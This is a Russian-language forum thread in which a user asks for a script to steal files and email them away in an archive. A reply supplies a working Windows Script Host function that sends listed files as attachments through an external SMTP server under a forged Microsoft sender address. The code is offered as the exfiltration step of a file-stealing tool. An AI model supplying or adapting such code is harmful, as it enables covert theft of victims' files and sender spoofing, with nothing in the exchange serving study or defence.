![]() |
Ищу vbs скрипт для угона файлов и их отправке на Мыло в архиве. Раньше Тут уже такой видел хотелось бы найти.
|
function SendMail(sRecipientMail, sSubject, sMsgBody,files)
{ try { // create a session and log on -- username and password in profile var refMsg = WScript.CreateObject("CDO.Message"); var refConf = WScript.CreateObject("CDO.Configuration"); // Setting configuration params with(refConf.Fields) { Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "www.mysmtp.com"; Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2; } refConf.Fields.Update(); with(refMsg) { Configuration = refConf; To = sRecipientMail; From = "billgates@microsoft.com"; Subject = sSubject; TextBody = sMsgBody; } if (files) { for(var i=0; i<files.length; i++) refMsg.AddAttachment(files[i]); } refMsg.Send(); } catch(e) { WScript.Echo("SendMail error: " + e.description); WScript.Quit(1); } } |
| Время: 10:28 |